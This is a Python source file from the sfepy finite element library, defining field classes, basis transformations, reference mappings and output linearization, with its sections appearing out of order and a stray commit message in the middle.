self.unused_dofs,
self.basis_transform)
else:
self.stored_subs = None
self.econn = self.econn0
self.econn0 = None
self.unused_dofs = None
self.basis_transform = None
def set_basis_transform(self, transform):
"""
Set local element basis transformation.
The basis transformation is applied in :func:`FEField.get_base()` and
:func:`FEField.create_mapping()`.
Parameters
----------
transform : array, shape `(n_cell, n_ep, n_ep)`
The array with `(n_ep, n_ep)` transformation matrices for each cell
in the field's region, where `n_ep` is the number of element DOFs.
"""
self.basis_transform = transform
def restore_substituted(self, vec):
"""
Restore values of the unused DOFs using the transpose of the applied
basis transformation.
"""
if (self.econn0 is None) or (self.basis_transform is None):
raise ValueError('no original DOF values to restore!!')
vec = vec.reshape((self.n_nod, self.n_components)).copy()
evec = vec[self.econn]
vec[self.econn0] = nm.einsum('cji,cjk->cik', self.basis_transform, evec)
return vec.ravel()
def get_base(self, key, derivative, integral, iels=None,
from_geometry=False, base_only=True):
qp = self.get_qp(key, integral)
if from_geometry:
ps = self.gel.poly_space
else:
ps = self.poly_space
_key = key if not from_geometry else 'g' + key
bf_key = (integral.order, _key, derivative)
if bf_key not in self.bf:
ori = self.ori
self.bf[bf_key] = ps.eval_base(qp.vals, diff=derivative, ori=ori,
transform=self.basis_transform)
bf = self.bf[bf_key]
if iels is not None and bf.ndim == 4:
bf = bf[iels]
if base_only:
return bf
else:
return bf, qp.weights
def create_bqp(self, region_name, integral):
gel = self.gel
sd = self.surface_data[region_name]
bqpkey = (integral.order, sd.bkey)
if not bqpkey in self.qp_coors:
qp = self.get_qp(sd.face_type, integral)
ps_s = self.gel.surface_facet.poly_space
bf_s = ps_s.eval_base(qp.vals)
coors, faces = gel.coors, gel.get_surface_entities()
vals = _interp_to_faces(coors, bf_s, faces)
self.qp_coors[bqpkey] = Struct(name='BQP_%s' % sd.bkey,
vals=vals, weights=qp.weights)
def extend_dofs(self, dofs, fill_value=None):
"""
Extend DOFs to the whole domain using the `fill_value`, or the
smallest value in `dofs` if `fill_value` is None.
"""
if fill_value is None:
if nm.isrealobj(dofs):
fill_value = get_min_value(dofs)
else:
# Complex values - treat real and imaginary parts separately.
fill_value = get_min_value(dofs.real)
fill_value += 1j * get_min_value(dofs.imag)
if self.approx_order != 0:
indx = self.get_vertices()
n_nod = self.domain.shape.n_nod
new_dofs = nm.empty((n_nod, dofs.shape[1]), dtype=self.dtype)
new_dofs.fill(fill_value)
new_dofs[indx] = dofs[:indx.size]
else:
new_dofs = extend_cell_data(dofs, self.domain, self.region,
val=fill_value)
return new_dofs
def remove_extra_dofs(self, dofs):
"""
Remove DOFs defined in higher order nodes (order > 1).
"""
if self.approx_order != 0:
new_dofs = dofs[:self.n_vertex_dof]
else:
new_dofs = dofs
return new_dofs
def linearize(self, dofs, min_level=0, max_level=1, eps=1e-4):
"""
Linearize the solution for post-processing.
Parameters
----------
dofs : array, shape (n_nod, n_component)
The array of DOFs reshaped so that each column corresponds
to one component.
min_level : int
The minimum required level of mesh refinement.
max_level : int
The maximum level of mesh refinement.
eps : float
The relative tolerance parameter of mesh adaptivity.
Returns
-------
mesh : Mesh instance
The adapted, nonconforming, mesh.
vdofs : array
The DOFs defined in vertices of `mesh`.
levels : array of ints
The refinement level used for each element group.
"""
assert_(dofs.ndim == 2)
n_nod, dpn = dofs.shape
assert_(n_nod == self.n_nod)
assert_(dpn == self.shape[0])
vertex_coors = self.coors[:self.n_vertex_dof, :]
ps = self.poly_space
gps = self.gel.poly_space
vertex_conn = self.econn[:, :self.gel.n_vertex]
eval_dofs = get_eval_dofs(dofs, self.econn, ps, ori=self.ori)
eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
(level, coors, conn,
vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
vertex_conn.shape[0], ps,
min_level=min_level,
max_level=max_level, eps=eps)
mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
self.domain.mesh.descs)
return mesh, vdofs, level
def get_output_approx_order(self):
"""
Get the approximation order used in the output file.
"""
return min(self.approx_order, 1)
def create_output(self, dofs, var_name, dof_names=None,
key=None, extend=True, fill_value=None,
linearization=None):
"""
Convert the DOFs corresponding to the field to a dictionary of
output data usable by Mesh.write().
Parameters
----------
dofs : array, shape (n_nod, n_component)
The array of DOFs reshaped so that each column corresponds
to one component.
var_name : str
The variable name corresponding to `dofs`.
dof_names : tuple of str
The names of DOF components.
key : str, optional
The key to be used in the output dictionary instead of the
variable name.
extend : bool
Extend the DOF values to cover the whole domain.
fill_value : float or complex
The value used to fill the missing DOF values if `extend` is True.
linearization : Struct or None
The linearization configuration for higher order approximations.
Returns
-------
out : dict
The output dictionary.
"""
linearization = get_default(linearization, Struct(kind='strip'))
out = {}
if linearization.kind is None:
out[key] = Struct(name='output_data', mode='full',
data=dofs, var_name=var_name,
dofs=dof_names, field_name=self.name)
elif linearization.kind == 'strip':
if extend:
ext = self.extend_dofs(dofs, fill_value)
else:
ext = self.remove_extra_dofs(dofs)
if ext is not None:
approx_order = self.get_output_approx_order()
if approx_order != 0:
# Has vertex data.
out[key] = Struct(name='output_data', mode='vertex',
data=ext, var_name=var_name,
dofs=dof_names)
else:
ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
out[key] = Struct(name='output_data', mode='cell',
data=ext, var_name=var_name,
dofs=dof_names)
else:
mesh, vdofs, levels = self.linearize(dofs,
linearization.min_level,
linearization.max_level,
linearization.eps)
out[key] = Struct(name='output_data', mode='vertex',
data=vdofs, var_name=var_name, dofs=dof_names,
mesh=mesh, levels=levels)
out = convert_complex_output(out)
return out
def create_mesh(self, extra_nodes=True):
"""
Create a mesh from the field region, optionally including the field
extra nodes.
"""
mesh = self.domain.mesh
if self.approx_order != 0:
if extra_nodes:
conn = self.econn
else:
conn = self.econn[:, :self.gel.n_vertex]
conns = [conn]
mat_ids = [mesh.cmesh.cell_groups]
descs = mesh.descs[:1]
if extra_nodes:
coors = self.coors
else:
coors = self.coors[:self.n_vertex_dof]
mesh = Mesh.from_data(self.name, coors, None, conns,
mat_ids, descs)
return mesh
def get_evaluate_cache(self, cache=None, share_geometry=False,
verbose=False):
"""
Get the evaluate cache for :func:`Variable.evaluate_at()
<sfepy.discrete.variables.Variable.evaluate_at()>`.
Parameters
----------
cache : Struct instance, optional
Optionally, use the provided instance to store the cache data.
share_geometry : bool
Set to True to indicate that all the evaluations will work on the
same region. Certain data are then computed only for the first
probe and cached.
verbose : bool
If False, reduce verbosity.
Returns
-------
cache : Struct instance
The evaluate cache.
"""
try:
from scipy.spatial import cKDTree as KDTree
except ImportError:
from scipy.spatial import KDTree
from sfepy.discrete.fem.geometry_element import create_geometry_elements
if cache is None:
cache = Struct(name='evaluate_cache')
timer = Timer(start=True)
if (cache.get('cmesh', None) is None) or not share_geometry:
mesh = self.create_mesh(extra_nodes=False)
cache.cmesh = cmesh = mesh.cmesh
gels = create_geometry_elements()
cmesh.set_local_entities(gels)
cmesh.setup_entities()
cache.centroids = cmesh.get_centroids(cmesh.tdim)
if self.gel.name != '3_8':
cache.normals0 = cmesh.get_facet_normals()
cache.normals1 = None
else:
cache.normals0 = cmesh.get_facet_normals(0)
cache.normals1 = cmesh.get_facet_normals(1)
output('cmesh setup: %f s' % timer.stop(), verbose=verbose)
timer.start()
if (cache.get('kdtree', None) is None) or not share_geometry:
cache.kdtree = KDTree(cmesh.coors)
output('kdtree: %f s' % timer.stop(), verbose=verbose)
return cache
def interp_to_qp(self, dofs):
"""
Interpolate DOFs into quadrature points.
The quadrature order is given by the field approximation order.
Parameters
----------
dofs : array
The array of DOF values of shape `(n_nod, n_component)`.
Returns
-------
data_qp : array
The values interpolated into the quadrature points.
integral : Integral
The corresponding integral defining the quadrature points.
"""
integral = Integral('i', order=self.approx_order)
bf = self.get_base('v', False, integral)
bf = bf[:,0,:].copy()
data_qp = nm.dot(bf, dofs[self.econn])
data_qp = nm.swapaxes(data_qp, 0, 1)
data_qp.shape = data_qp.shape + (1,)
return data_qp, integral
def get_coor(self, nods=None):
"""
Get coordinates of the field nodes.
Parameters
----------
nods : array, optional
The indices of the required nodes. If not given, the
coordinates of all the nodes are returned.
"""
if nods is None:
return self.coors
else:
return self.coors[nods]
def get_connectivity(self, region, integration, is_trace=False):
"""
Convenience alias to `Field.get_econn()`, that is used in some terms.
"""
return self.get_econn(integration, region, is_trace=is_trace)
def create_mapping(self, region, integral, integration,
return_mapping=True):
"""
Create a new reference mapping.
Compute jacobians, element volumes and base function derivatives
for Volume-type geometries (volume mappings), and jacobians,
normals and base function derivatives for Surface-type
geometries (surface mappings).
Notes
-----
- surface mappings are defined on the surface region
- surface mappings require field order to be > 0
"""
domain = self.domain
coors = domain.get_mesh_coors(actual=True)
dconn = domain.get_conn()
if integration == 'volume':
qp = self.get_qp('v', integral)
iels = region.get_cells()
geo_ps = self.gel.poly_space
ps = self.poly_space
bf = self.get_base('v', 0, integral, iels=iels)
conn = nm.take(dconn, iels.astype(nm.int32), axis=0)
mapping = VolumeMapping(coors, conn, poly_space=geo_ps)
vg = mapping.get_mapping(qp.vals, qp.weights, poly_space=ps,
ori=self.ori,
transform=self.basis_transform)
out = vg
elif (integration == 'surface') or (integration == 'surface_extra'):
assert_(self.approx_order > 0)
if self.ori is not None:
msg = 'surface integrals do not work yet with the' \
' hierarchical basis!'
raise ValueError(msg)
sd = domain.surface_groups[region.name]
esd = self.surface_data[region.name]
geo_ps = self.gel.poly_space
ps = self.poly_space
conn = sd.get_connectivity()
mapping = SurfaceMapping(coors, conn, poly_space=geo_ps)
if not self.is_surface:
self.create_bqp(region.name, integral)
qp = self.qp_coors[(integral.order, esd.bkey)]
abf = ps.eval_base(qp.vals[0], transform=self.basis_transform)
bf = abf[..., self.efaces[0]]
indx = self.gel.get_surface_entities()[0]
# Fix geometry element's 1st facet orientation for gradients.
indx = nm.roll(indx, -1)[::-1]
mapping.set_basis_indices(indx)
sg = mapping.get_mapping(qp.vals[0], qp.weights,
poly_space=Struct(n_nod=bf.shape[-1]),
mode=integration)
if integration == 'surface_extra':
sg.alloc_extra_data(self.econn.shape[1])
bf_bg = geo_ps.eval_base(qp.vals, diff=True)
ebf_bg = self.get_base(esd.bkey, 1, integral)
sg.evaluate_bfbgm(bf_bg, ebf_bg, coors, sd.fis, dconn)
else:
# Do not use BQP for surface fields.
qp = self.get_qp(sd.face_type, integral)
bf = ps.eval_base(qp.vals, transform=self.basis_transform)
sg = mapping.get_mapping(qp.vals, qp.weights,
poly_space=Struct(n_nod=bf.shape[-1]),
mode=integration)
out = sg
elif integration == 'point':
out = mapping = None
elif integration == 'custom':
raise ValueError('cannot create custom mapping!')
else:
raise ValueError('unknown integration geometry type: %s'
% integration)
if out is not None:
# Store the integral used.
out.integral = integral
out.qp = qp
out.ps = ps
# Update base.
out.bf[:] = bf
if return_mapping:
out = (out, mapping)
return out
class VolumeField(FEField):
"""
Finite element field base class over volume elements (element dimension
equals space dimension).
"""
def _check_region(self, region):
"""
Check whether the `region` can be used for the
field.
Returns
-------
ok : bool
True if the region is usable for the field.
"""
ok = True
domain = region.domain
if region.kind != 'cell':
output("bad region kind! (is: %r, should be: 'cell')"
% region.kind)
ok = False
elif (region.kind_tdim != domain.shape.tdim):
output('cells with a bad topological dimension! (%d == %d)'
% (region.kind_tdim, domain.shape.tdim))
ok = False
return ok
def _setup_geometry(self):
"""
Setup the field region geometry.
"""
cmesh = self.domain.cmesh
for key, gel in six.iteritems(self.domain.geom_els):
ct = cmesh.cell_types
if (ct[self.region.cells] == cmesh.key_to_index[gel.name]).all():
self.gel = gel
break
else:
raise ValueError('region %s of field %s contains multiple'
' reference geometries!'
% (self.region.name, self.name))
self.is_surface = False
def _create_interpolant(self):
name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
self.poly_space_base, self.approx_order,
'B' * self.force_bubble)
ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
base=self.poly_space_base,
force_bubble=self.force_bubble)
self.poly_space = ps
def _init_econn(self):
"""
Initialize the extended DOF connectivity.
"""
n_ep = self.poly_space.n_nod
n_cell = self.region.get_n_cells()
self.econn = nm.zeros((n_cell, n_ep), nm.int32)
def _setup_vertex_dofs(self):
"""
Setup vertex DOF connectivity.
"""
if self.node_desc.vertex is None:
return 0, None
region = self.region
cmesh = self.domain.cmesh
conn, offsets = cmesh.get_incident(0, region.cells, region.tdim,
ret_offsets=True)
vertices = nm.unique(conn)
remap = prepare_remap(vertices, region.n_v_max)
n_dof = vertices.shape[0]
aux = nm.unique(nm.diff(offsets))
assert_(len(aux) == 1, 'region with multiple reference geometries!')
offset = aux[0]
# Remap vertex node connectivity to field-local numbering.
aux = conn.reshape((-1, offset)).astype(nm.int32)
self.econn[:, :offset] = nm.take(remap, aux)
return n_dof, remap
def setup_extra_data(self, geometry, info, is_trace):
dct = info.dc_type.type
if geometry != None:
geometry_flag = 'surface' in geometry
else:
geometry_flag = False
if (dct == 'surface') or (geometry_flag):
reg = info.get_region()
mreg_name = info.get_region_name(can_trace=False)
self.domain.create_surface_group(reg)
self.setup_surface_data(reg, is_trace, mreg_name)
elif dct == 'edge':
raise NotImplementedError('dof connectivity type %s' % dct)
elif dct == 'point':
self.setup_point_data(self, info.region)
elif dct not in ('volume', 'scalar', 'custom'):
raise ValueError('unknown dof connectivity type! (%s)' % dct)
def setup_point_data(self, field, region):
if region.name not in self.point_data:
conn = field.get_dofs_in_region(region, merge=True)
conn.shape += (1,)
self.point_data[region.name] = conn
def setup_surface_data(self, region, is_trace=False, trace_region=None):
"""nodes[leconn] == econn"""
"""nodes are sorted by node number -> same order as region.vertices"""
if region.name not in self.surface_data:
sd = FESurface('surface_data_%s' % region.name, region,
self.efaces, self.econn, self.region)
self.surface_data[region.name] = sd
if region.name in self.surface_data and is_trace:
sd = self.surface_data[region.name]
sd.setup_mirror_connectivity(region, trace_region)
return self.surface_data[region.name]
def get_econn(self, conn_type, region, is_trace=False, integration=None):
"""
Get extended connectivity of the given type in the given region.
"""
ct = conn_type.type if isinstance(conn_type, Struct) else conn_type
if ct in ('volume', 'custom'):
if region.name == self.region.name:
conn = self.econn
else:
tco = integration in ('volume', 'custom')
cells = region.get_cells(true_cells_only=tco)
ii = self.region.get_cell_indices(cells, true_cells_only=tco)
conn = nm.take(self.econn, ii, axis=0)
elif ct == 'surface':
sd = self.surface_data[region.name]
conn = sd.get_connectivity(is_trace=is_trace)
elif ct == 'edge':
raise NotImplementedError('connectivity type %s' % ct)
elif ct == 'point':
conn = self.point_data[region.name]
else:
raise ValueError('unknown connectivity type! (%s)' % ct)
return conn
def average_qp_to_vertices(self, data_qp, integral):
"""
Average data given in quadrature points in region elements into
region vertices.
.. math::
u_n = \sum_e (u_{e,avg} * volume_e) / \sum_e volume_e
= \sum_e \int_{volume_e} u / \sum volume_e
"""
region = self.region
n_cells = region.get_n_cells()
if n_cells != data_qp.shape[0]:
msg = 'incomatible shape! (%d == %d)' % (n_cells,
data_qp.shape[0])
raise ValueError(msg)
n_vertex = self.n_vertex_dof
nc = data_qp.shape[2]
nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)
vg = self.get_mapping(self.region, integral, 'volume')[0]
volume = nm.squeeze(vg.volume)
iels = self.region.get_cells()
data_e = nm.zeros((volume.shape[0], 1, nc, 1), dtype=nm.float64)
vg.integrate(data_e, data_qp[iels])
ir = nm.arange(nc, dtype=nm.int32)
conn = self.econn[:, :self.gel.n_vertex]
for ii, cc in enumerate(conn):
# Assumes unique nodes in cc!
ind2, ind1 = nm.meshgrid(ir, cc)
data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
nod_vol[cc] += volume[ii]
data_vertex /= nod_vol[:,nm.newaxis]
return data_vertex
class SurfaceField(FEField):
"""
Finite element field base class over surface (element dimension is one
less than space dimension).
"""
def _check_region(self, region):
"""
Check whether the `region` can be used for the
field.
Returns
-------
ok : bool
True if the region is usable for the field.
"""
ok1 = ((region.kind_tdim == (region.tdim - 1))
and (region.get_n_cells(True) > 0))
if not ok1:
output('bad region topological dimension and kind! (%d, %s)'
% (region.tdim, region.kind))
n_ns = region.get_facet_indices().shape[0] - region.get_n_cells(True)
ok2 = n_ns == 0
if not ok2:
output('%d region facets are not on the domain surface!' % n_ns)
return ok1 and ok2
def _setup_geometry(self):
"""
Setup the field region geometry.
"""
for key, vgel in six.iteritems(self.domain.geom_els):
self.gel = vgel.surface_facet
break
if self.gel is None:
raise ValueError('cells with no surface!')
self.is_surface = True
def _create_interpolant(self):
name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
self.poly_space_base, self.approx_order,
'B' * self.force_bubble)
ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
base=self.poly_space_base,
force_bubble=self.force_bubble)
self.poly_space = ps
def setup_extra_data(self, geometry, info, is_trace):
dct = info.dc_type.type
if dct != 'surface':
msg = "dof connectivity type must be 'surface'! (%s)" % dct
raise ValueError(msg)
reg = info.get_region()
if reg.name not in self.surface_data:
# Defined in setup_vertex_dofs()
msg = 'no surface data of surface field! (%s)' % reg.name
raise ValueError(msg)
if reg.name in self.surface_data and is_trace:
sd = self.surface_data[reg.name]
mreg_name = info.get_region_name(can_trace=False)
sd.setup_mirror_connectivity(reg, mreg_name)
def _init_econn(self):
"""
Initialize the extended DOF connectivity.
"""
n_ep = self.poly_space.n_nod
n_cell = self.region.get_n_cells(is_surface=self.is_surface)
self.econn = nm.zeros((n_cell, n_ep), nm.int32)
def _setup_vertex_dofs(self):
"""
Setup vertex DOF connectivity.
"""
if self.node_desc.vertex is None:
return 0, None
region = self.region
remap = prepare_remap(region.vertices, region.n_v_max)
n_dof = region.vertices.shape[0]
# Remap vertex node connectivity to field-local numbering.
conn, gel = self.domain.get_conn(ret_gel=True)
faces = gel.get_surface_entities()
aux = FESurface('aux', region, faces, conn)
self.econn[:, :aux.n_fp] = aux.leconn
self.surface_data[region.name] = aux
return n_dof, remap
def _setup_bubble_dofs(self):
"""
Setup bubble DOF connectivity.
"""
return 0, None, None
def get_econn(self, conn_type, region, is_trace=False,
integration=None):
"""
Get extended connectivity of the given type in the given region.
"""
ct = conn_type.type if isinstance(conn_type, Struct) else conn_type
if ct != 'surface':
msg = 'connectivity type must be "surface"! (%s)' % ct
raise ValueError(msg)
sd = self.surface_data[region.name]
conn = sd.get_connectivity(local=True, is_trace=is_trace)
return conn
def average_qp_to_vertices(self, data_qp, integral):
"""
Average data given in quadrature points in region elements into
region vertices.
.. math::
u_n = \sum_e (u_{e,avg} * area_e) / \sum_e area_e
= \sum_e \int_{area_e} u / \sum area_e
"""
region = self.region
n_cells = region.get_n_cells(True)
if n_cells != data_qp.shape[0]:
msg = 'incomatible shape! (%d == %d)' % (n_cells,
data_qp.shape[0])
raise ValueError(msg)
n_vertex = len(region.vertices)
nc = data_qp.shape[2]
nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)
sg = self.get_mapping(self.region, integral, 'surface')[0]
area = nm.squeeze(sg.volume)
n_cells = region.get_n_cells(True)
iels = nm.arange(n_cells, dtype=nm.int32)
data_e = nm.zeros((area.shape[0], 1, nc, 1), dtype=nm.float64)
sg.integrate(data_e, data_qp[iels])
ir = nm.arange(nc, dtype=nm.int32)
sd = self.domain.surface_groups[region.name]
# Should be vertex connectivity!
conn = sd.get_connectivity(local=True)
for ii, cc in enumerate(conn):
# Assumes unique nodes in cc!
ind2, ind1 = nm.meshgrid(ir, cc)
data_vertex[ind1,ind2] += data_e[iels[ii],0,:,0]
nod_vol[cc] += area[ii]
data_vertex /= nod_vol[:,nm.newaxis]
return data_vertex
class H1Mixin(Struct):
"""
Methods of fields specific to H1 space.
"""
def _setup_shape(self):
"""
Setup the field's shape-related attributes, see :class:`Field`.
"""
self.n_components = nm.prod(self.shape)
self.val_shape = self.shape
fix FEField.create_mapping() for basis transform and subdomains
- WIP - raise exception for surface integration
"""
Notes
-----
Important attributes of continuous (order > 0) :class:`Field` and
:class:`SurfaceField` instances:
- `vertex_remap` : `econn[:, :n_vertex] = vertex_remap[conn]`
- `vertex_remap_i` : `conn = vertex_remap_i[econn[:, :n_vertex]]`
where `conn` is the mesh vertex connectivity, `econn` is the
region-local field connectivity.
"""
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import output, get_default, assert_
from sfepy.base.base import Struct
from sfepy.base.timing import Timer
from sfepy.discrete.common.fields import parse_shape, Field
from sfepy.discrete.fem.mesh import Mesh
from sfepy.discrete.fem.meshio import convert_complex_output
from sfepy.discrete.fem.utils import (extend_cell_data, prepare_remap,
invert_remap, get_min_value)
from sfepy.discrete.fem.mappings import VolumeMapping, SurfaceMapping
from sfepy.discrete.fem.poly_spaces import PolySpace
from sfepy.discrete.fem.fe_surface import FESurface
from sfepy.discrete.integrals import Integral
from sfepy.discrete.fem.linearizer import (get_eval_dofs, get_eval_coors,
create_output)
import six
def set_mesh_coors(domain, fields, coors, update_fields=False, actual=False,
clear_all=True, extra_dofs=False):
if actual:
if not hasattr(domain.mesh, 'coors_act'):
domain.mesh.coors_act = nm.zeros_like(domain.mesh.coors)
domain.mesh.coors_act[:] = coors[:domain.mesh.n_nod]
else:
domain.cmesh.coors[:] = coors[:domain.mesh.n_nod]
if update_fields:
for field in six.itervalues(fields):
field.set_coors(coors, extra_dofs=extra_dofs)
field.clear_mappings(clear_all=clear_all)
def eval_nodal_coors(coors, mesh_coors, region, poly_space, geom_poly_space,
econn, only_extra=True):
"""
Compute coordinates of nodes corresponding to `poly_space`, given
mesh coordinates and `geom_poly_space`.
"""
if only_extra:
iex = (poly_space.nts[:,0] > 0).nonzero()[0]
if iex.shape[0] == 0: return
qp_coors = poly_space.node_coors[iex, :]
econn = econn[:, iex].copy()
else:
qp_coors = poly_space.node_coors
##
# Evaluate geometry interpolation base functions in (extra) nodes.
bf = geom_poly_space.eval_base(qp_coors)
bf = bf[:,0,:].copy()
##
# Evaluate extra coordinates with 'bf'.
cmesh = region.domain.cmesh
conn = cmesh.get_incident(0, region.cells, region.tdim)
conn.shape = (econn.shape[0], -1)
ecoors = nm.dot(bf, mesh_coors[conn])
coors[econn] = nm.swapaxes(ecoors, 0, 1)
def _interp_to_faces(vertex_vals, bfs, faces):
dim = vertex_vals.shape[1]
n_face = faces.shape[0]
n_qp = bfs.shape[0]
faces_vals = nm.zeros((n_face, n_qp, dim), nm.float64)
for ii, face in enumerate(faces):
vals = vertex_vals[face,:dim]
faces_vals[ii,:,:] = nm.dot(bfs[:,0,:], vals)
return(faces_vals)
def get_eval_expression(expression,
fields, materials, variables,
functions=None, mode='eval', term_mode=None,
extra_args=None, verbose=True, kwargs=None):
"""
Get the function for evaluating an expression given a list of elements,
and reference element coordinates.
"""
from sfepy.discrete.evaluate import eval_in_els_and_qp
def _eval(iels, coors):
val = eval_in_els_and_qp(expression, iels, coors,
fields, materials, variables,
functions=functions, mode=mode,
term_mode=term_mode,
extra_args=extra_args, verbose=verbose,
kwargs=kwargs)
return val[..., 0]
return _eval
def create_expression_output(expression, name, primary_field_name,
fields, materials, variables,
functions=None, mode='eval', term_mode=None,
extra_args=None, verbose=True, kwargs=None,
min_level=0, max_level=1, eps=1e-4):
"""
Create output mesh and data for the expression using the adaptive
linearizer.
Parameters
----------
expression : str
The expression to evaluate.
name : str
The name of the data.
primary_field_name : str
The name of field that defines the element groups and polynomial
spaces.
fields : dict
The dictionary of fields used in `variables`.
materials : Materials instance
The materials used in the expression.
variables : Variables instance
The variables used in the expression.
functions : Functions instance, optional
The user functions for materials etc.
mode : one of 'eval', 'el_avg', 'qp'
The evaluation mode - 'qp' requests the values in quadrature points,
'el_avg' element averages and 'eval' means integration over
each term region.
term_mode : str
The term call mode - some terms support different call modes
and depending on the call mode different values are
returned.
extra_args : dict, optional
Extra arguments to be passed to terms in the expression.
verbose : bool
If False, reduce verbosity.
kwargs : dict, optional
The variables (dictionary of (variable name) : (Variable
instance)) to be used in the expression.
min_level : int
The minimum required level of mesh refinement.
max_level : int
The maximum level of mesh refinement.
eps : float
The relative tolerance parameter of mesh adaptivity.
Returns
-------
out : dict
The output dictionary.
"""
field = fields[primary_field_name]
vertex_coors = field.coors[:field.n_vertex_dof, :]
ps = field.poly_space
gps = field.gel.poly_space
vertex_conn = field.econn[:, :field.gel.n_vertex]
eval_dofs = get_eval_expression(expression,
fields, materials, variables,
functions=functions,
mode=mode, extra_args=extra_args,
verbose=verbose, kwargs=kwargs)
eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
(level, coors, conn,
vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
vertex_conn.shape[0], ps,
min_level=min_level,
max_level=max_level, eps=eps)
mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
field.domain.mesh.descs)
out = {}
out[name] = Struct(name='output_data', mode='vertex',
data=vdofs, var_name=name, dofs=None,
mesh=mesh, level=level)
out = convert_complex_output(out)
return out
class FEField(Field):
"""
Base class for finite element fields.
Notes
-----
- interps and hence node_descs are per region (must have single
geometry!)
Field shape information:
- ``shape`` - the shape of the base functions in a point
- ``n_components`` - the number of DOFs per FE node
- ``val_shape`` - the shape of field value (the product of DOFs and
base functions) in a point
"""
def __init__(self, name, dtype, shape, region, approx_order=1):
"""
Create a finite element field.
Parameters
----------
name : str
The field name.
dtype : numpy.dtype
The field data type: float64 or complex128.
shape : int/tuple/str
The field shape: 1 or (1,) or 'scalar', space dimension (2, or (2,)
or 3 or (3,)) or 'vector', or a tuple. The field shape determines
the shape of the FE base functions and is related to the number of
components of variables and to the DOF per node count, depending
on the field kind.
region : Region
The region where the field is defined.
approx_order : int or tuple
The FE approximation order. The tuple form is (order, has_bubble),
e.g. (1, True) means order 1 with a bubble function.
Notes
-----
Assumes one cell type for the whole region!
"""
shape = parse_shape(shape, region.domain.shape.dim)
if not self._check_region(region):
raise ValueError('unsuitable region for field %s! (%s)' %
(name, region.name))
Struct.__init__(self, name=name, dtype=dtype, shape=shape,
region=region)
self.domain = self.region.domain
self._set_approx_order(approx_order)
self._setup_geometry()
self._setup_kind()
self._setup_shape()
self.surface_data = {}
self.point_data = {}
self.ori = None
self._create_interpolant()
self._setup_global_base()
self.setup_coors()
self.clear_mappings(clear_all=True)
self.clear_qp_base()
self.basis_transform = None
self.econn0 = None
self.unused_dofs = None
self.stored_subs = None
def _set_approx_order(self, approx_order):
"""
Set a uniform approximation order.
"""
if isinstance(approx_order, tuple):
self.approx_order = approx_order[0]
self.force_bubble = approx_order[1]
else:
self.approx_order = approx_order
self.force_bubble = False
def get_true_order(self):
"""
Get the true approximation order depending on the reference
element geometry.
For example, for P1 (linear) approximation the true order is 1,
while for Q1 (bilinear) approximation in 2D the true order is 2.
"""
gel = self.gel
if (gel.dim + 1) == gel.n_vertex:
order = self.approx_order
else:
order = gel.dim * self.approx_order
if self.force_bubble:
bubble_order = gel.dim + 1
order = max(order, bubble_order)
return order
def is_higher_order(self):
"""
Return True, if the field's approximation order is greater than one.
"""
return self.force_bubble or (self.approx_order > 1)
def _setup_global_base(self):
"""
Setup global DOF/base functions, their indices and connectivity of the
field. Called methods implemented in subclasses.
"""
self._setup_facet_orientations()
self._init_econn()
self.n_vertex_dof, self.vertex_remap = self._setup_vertex_dofs()
self.vertex_remap_i = invert_remap(self.vertex_remap)
aux = self._setup_edge_dofs()
self.n_edge_dof, self.edge_dofs, self.edge_remap = aux
aux = self._setup_face_dofs()
self.n_face_dof, self.face_dofs, self.face_remap = aux
aux = self._setup_bubble_dofs()
self.n_bubble_dof, self.bubble_dofs, self.bubble_remap = aux
self.n_nod = self.n_vertex_dof + self.n_edge_dof \
+ self.n_face_dof + self.n_bubble_dof
self._setup_esurface()
def _setup_esurface(self):
"""
Setup extended surface entities (edges in 2D, faces in 3D),
i.e. indices of surface entities into the extended connectivity.
"""
node_desc = self.node_desc
gel = self.gel
self.efaces = gel.get_surface_entities().copy()
nd = node_desc.edge
if nd is not None:
efs = []
for eof in gel.get_edges_per_face():
efs.append(nm.concatenate([nd[ie] for ie in eof]))
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
efs = node_desc.face
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.efaces = nm.hstack((self.efaces, efs))
if gel.dim == 3:
self.eedges = gel.edges.copy()
efs = node_desc.edge
if efs is not None:
efs = nm.array(efs).squeeze()
if efs.ndim < 2:
efs = efs[:,nm.newaxis]
self.eedges = nm.hstack((self.eedges, efs))
def set_coors(self, coors, extra_dofs=False):
"""
Set coordinates of field nodes.
"""
# Mesh vertex nodes.
if self.n_vertex_dof:
indx = self.vertex_remap_i
self.coors[:self.n_vertex_dof] = nm.take(coors,
indx.astype(nm.int32),
axis=0)
n_ex_dof = self.n_bubble_dof + self.n_edge_dof + self.n_face_dof
# extra nodes
if n_ex_dof:
if extra_dofs:
if self.n_nod != coors.shape[0]:
raise NotImplementedError
self.coors[:] = coors
else:
gps = self.gel.poly_space
ps = self.poly_space
eval_nodal_coors(self.coors, coors, self.region,
ps, gps, self.econn)
def setup_coors(self):
"""
Setup coordinates of field nodes.
"""
mesh = self.domain.mesh
self.coors = nm.empty((self.n_nod, mesh.dim), nm.float64)
self.set_coors(mesh.coors)
def get_vertices(self):
"""
Return indices of vertices belonging to the field region.
"""
return self.vertex_remap_i
def _get_facet_dofs(self, rfacets, remap, dofs):
facets = remap[rfacets]
return dofs[facets[facets >= 0]].ravel()
def get_data_shape(self, integral, integration='volume', region_name=None):
"""
Get element data dimensions.
Parameters
----------
integral : Integral instance
The integral describing used numerical quadrature.
